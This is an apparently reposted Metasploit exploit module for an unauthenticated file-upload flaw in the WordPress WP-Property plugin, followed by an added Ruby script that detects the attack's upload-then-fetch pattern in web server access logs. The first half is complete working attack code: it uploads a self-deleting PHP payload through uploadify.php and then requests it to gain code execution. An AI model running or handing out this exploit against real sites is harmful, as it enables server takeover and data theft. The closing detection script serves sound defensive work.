WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
            'Description'    => %q{
                    This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82656' ],
                    [ 'BID', '53787' ],
                    [ 'EDB', '18987'],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
            'method' => 'GET',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
end

Don't ask me what this code is or how to use it. I'm talking about msf.
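
The two requests the module above sends leave a recognisable pair in a web server's access log. The following is an added example, not part of the original post or of Metasploit: it scans log lines for a successful POST to the plugin's uploadify.php followed by a GET for another .php file in the same directory from the same client. The log lines are constructed samples, and the assumption that uploaded files land in the uploadify directory is taken from the `folder` value the module sends.

```ruby
# Added example, not part of the original post or of Metasploit.
# Flags a successful POST to the plugin's uploadify.php that is followed by a
# GET for another PHP file in the same directory from the same client.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Assumption: extend with any other scripts your installed copy ships here.
KNOWN_SCRIPTS = ['uploadify.php'].freeze
# Common/combined log format: client, two ids, [time], "METHOD path proto", status
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})\b/

def find_upload_exec(lines)
  uploads = {}   # client ip => line number of its latest successful upload
  findings = []
  lines.each_with_index do |line, idx|
    m = LOG_RE.match(line)
    next unless m
    path = m[:path].split('?', 2).first      # ignore any query string
    pos = path.index(UPLOADIFY_DIR)
    next unless pos
    file = path[(pos + UPLOADIFY_DIR.length)..-1]
    if m[:method] == 'POST' && file == 'uploadify.php' && m[:status] == '200'
      uploads[m[:ip]] = idx + 1
    elsif m[:method] == 'GET' && file =~ /\A[^\/]+\.php\z/i &&
          !KNOWN_SCRIPTS.include?(file.downcase) && uploads.key?(m[:ip])
      findings << { ip: m[:ip], upload_line: uploads[m[:ip]],
                    exec_line: idx + 1, file: file }
    end
  end
  findings
end

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = <<~LOG.lines(chomp: true)
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120
  192.0.2.10 - - [04/Jan/2013:19:41:10 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  192.0.2.10 - - [04/Jan/2013:19:41:12 +0000] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 78
  192.0.2.10 - - [04/Jan/2013:19:41:13 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/aBcDe.php HTTP/1.1" 200 0
  198.51.100.7 - - [04/Jan/2013:19:42:00 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900
LOG

find_upload_exec(SAMPLE_LOG).each do |f|
  puts "#{f[:ip]}: upload at line #{f[:upload_line]}, #{f[:file]} requested at line #{f[:exec_line]}"
end
```

Correlating on client address misses a file that is fetched from a different address, so any unexpected .php file present in that directory is worth reviewing as well.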